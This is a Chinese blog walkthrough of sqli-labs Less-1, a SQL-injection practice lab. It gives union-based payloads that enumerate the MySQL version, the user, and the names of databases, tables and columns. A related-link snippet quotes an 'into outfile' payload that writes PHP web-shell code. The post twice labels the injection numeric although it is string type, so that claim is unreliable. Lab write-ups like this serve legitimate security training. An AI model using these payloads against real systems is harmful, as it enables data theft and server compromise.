sqli-labs靶场less-1

已于 2024-10-02 02:31:13 修改
阅读量231 收藏 10
点赞数 5
分类专栏: sqli-labs靶场 文章标签: sql 安全
于 2024-09-29 23:21:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanggonghanfei/article/details/142645765
版权

sqllilabs靶场第一场记录

1、判断注入点

image-20240928174439631

在url后面写?id=1,有回显,

image-20240928175234835

输入?id=2,也有回显,输入?id=0,回显

image-20240928174605844

判断有注入

加单引号:?id=1’

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1

报错,从 ’ ‘1’ ’ LIMIT 0,1’ 可以得知,多一个单引号,怀疑为数字型注入

因为单引号需要闭合,同时原先查询语句的单引号需要注释掉,构造语句

?id=1' and 1=1 --+

第一个单引号闭合sql语句的查询,–注释掉原先语句的的单引号,+在表示空格,回显:image-20240928175256193

构造:?id=1’ and 1=2 --+,回显:

image-20240928175533142

确定为数字型注入

2、确定列数

构造

?id=1’ order by 10 --+

image-20240928175648944

将5依次设置其他数值,发现id=3时:回显正常

image-20240928175723787

确定有三列

3、回显位置

注入过程中,union和前面一条SQL语句拼接,并构造其列数与前面的SQL语句列数相同,如1,2,3==4,5,6均为3列。我们把这种注入方式称为union注入

构造

/id=-1’ union select 1,2,3 --+

将1设置为-1使其原先的页面回显不显示,而回显union查询的部分,回显结果:

image-20240928180711121

确定2和3为回显位

4、获取信息

/?id=-1’ union select 1,version(),database() --+

显示MySQL的版本与数据库名

image-20240928180850166

当前用户名

?id=-1’ union select 1,user(),current_user() --+

image-20240928181048761

image-20240928181346938

构造

?id=-1’ union select 1,group_concat(schema_name),3 from information_schema.schemata --+ 爆出所有数据库名

image-20240928181522103

爆当前数据库的表名

?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()–+

image-20240928181909697

爆列名

/?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’–+

image-20240928182055387

其他表于此同理,至此大功告成

子非鱼999
关注
专栏目录
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs靶场Less-1
songling515010475的专栏
08-19 185
1、访问首页,index.php?id=1,这里的传参点是id 2、判断是否在SQL注入 and 1=1-- qwe and 1=2-- qwe 分析:从以上两种探测形式来看,and 1=1 和 and 1=2并没有影响结果,难道不存在SQL注入?当然不可能,这是靶场SQL注入肯定是存在的. ----------------------------------------------------往下看-----------------------------------------
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
2.1.SQL注入之sqli-labs环境搭建
最新发布
qq_64177395的博客
09-03 1016
往往很多新手在刚学习SQL注入的时候,都需要拥有一个能SQL注入的网站,需要有的。直接去互联网上找的话对新手未免有点太难了,因此:我们一般都是在本地搭建一个能SQL注入测试的网站,那样我们学习SQL注入就容易多了。Sqli-labs是一个印度程序员写的,用来学习的一个游戏教程。
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 9861
sql注入集合
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 6296
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs靶场实战
u011417723的博客
03-08 2956
靶场实战
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-labs靶场
lxz021202的博客
03-20 871
详解sqli-labs靶场
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1913
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1442
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli-labs详解------持续更新
yuqie的博客
06-20 3510
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
sqli-labs通关详解
m0_52051132的博客
10-15 7045
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
SQL注入—Sqli-labs注入环境搭建》
weixin_47118413的博客
04-06 8364
本文章讲解如何通过Linux(Centos 7)和Windows部署Sqli-labs环境进行sql注入漏洞相关练习,后期会更新关卡教程。
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
零基础学SQL注入必练靶场SQLiLabs(搭建+打靶)
Ms08067安全实验室
12-20 1万+
文章来源 | MS08067Web零基础就业班1期作业本文作者:giunwr、tyrant(零基础1期)SQLi-Labs是一个专业的SQL注入漏洞练习靶场,零基础的同学学SQL注入的时候,sqli-labs这个靶场是必练的,它里面包含了很多注入场景,以及在sql注入的时候遇到的各种问题,适用于GET和POST场景,包含了以下注入:一、作业描述完成sqllibs前18关,尽可能使用多的方法二、s...
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 3193
sqli-labs靶场之前建议补一下基础。
最详细sqli-labs平台前十关讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3497
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值